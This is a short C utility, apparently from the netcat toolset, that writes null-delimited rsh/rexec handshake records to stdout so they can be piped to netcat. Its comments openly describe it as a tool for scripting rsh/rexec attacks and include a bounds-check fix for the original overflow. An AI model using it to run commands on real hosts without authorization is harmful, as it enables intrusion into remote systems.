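/* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up
   rsh/rexec attacks.  Needs to be a prog because shells strip out nulls.

   args:
	locuser remuser [cmd]
	remuser passwd [cmd]

   cmd defaults to "pwd".

   ... whatever.  _H*/

/* NOTE(review): the emitted layout is
	\0 arg1 \0 arg2 \0 cmd \0 \n
   which looks like the null-delimited field framing the legacy rsh/rexec
   services read at connection start -- confirm against the service docs.
   In the second argument form the password sits in argv, so it is visible
   to anything that can read this process's command line.  */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* change if you like; "id" is a good one for figuring out if you won too */
static char cmd[] = "pwd";

static char buf [256];

/* Copy one field plus its terminating null into buf at offset *used.
   Returns 0 on success, -1 if the field would not leave room for itself,
   its null and the final newline.  buf is pre-zeroed, so the null is
   already in place and only the offset has to step over it.  */
static int
put_field (const char * src, size_t * used)
{
  size_t len = strlen (src);
  size_t avail = sizeof (buf) - *used;

  /* the original copied unchecked ("not checked -- bfd"); long arguments
     ran straight off the end of the 256-byte static buffer */
  if (avail < 2 || len > avail - 2)
    return -1;

  memcpy (buf + *used, src, len);
  *used += len + 1;
  return 0;
}

/* Build the null-delimited record from argv[1], argv[2] and the optional
   argv[3] (default: cmd) and write it to stdout.
   Exits 0 on success; exits 1 if fewer than two arguments are given, if
   the fields do not fit in buf, or if the write fails.  */
int
main (int argc, char * argv[])
{
  size_t used;
  const char * q;
  ssize_t wrote;

  (void) argc;			/* argv's null terminator is what gets tested */

  memset (buf, 0, sizeof (buf));
  used = 1;			/* first null */

  if (! argv[1])
    goto wrong;
  if (put_field (argv[1], &used) < 0)	/* first arg plus another null */
    goto toolong;

  if (! argv[2])
    goto wrong;
  if (put_field (argv[2], &used) < 0)	/* second arg plus null */
    goto toolong;

  q = cmd;
  if (argv[3])
    q = argv[3];
  if (put_field (q, &used) < 0)		/* the command, plus final null */
    goto toolong;

  buf[used] = '\n';		/* and a newline, so it goes */
  used++;

  wrote = write (1, buf, used);
  if (wrote < 0 || (size_t) wrote != used) {
    perror ("write");
    exit (1);
  }
  exit (0);

toolong:
  fprintf (stderr, "arguments too long for %lu-byte buffer.\n",
	   (unsigned long) sizeof (buf));
  exit (1);

wrong:
  fprintf (stderr, "wrong! needs 2 or more args.\n");
  exit (1);
}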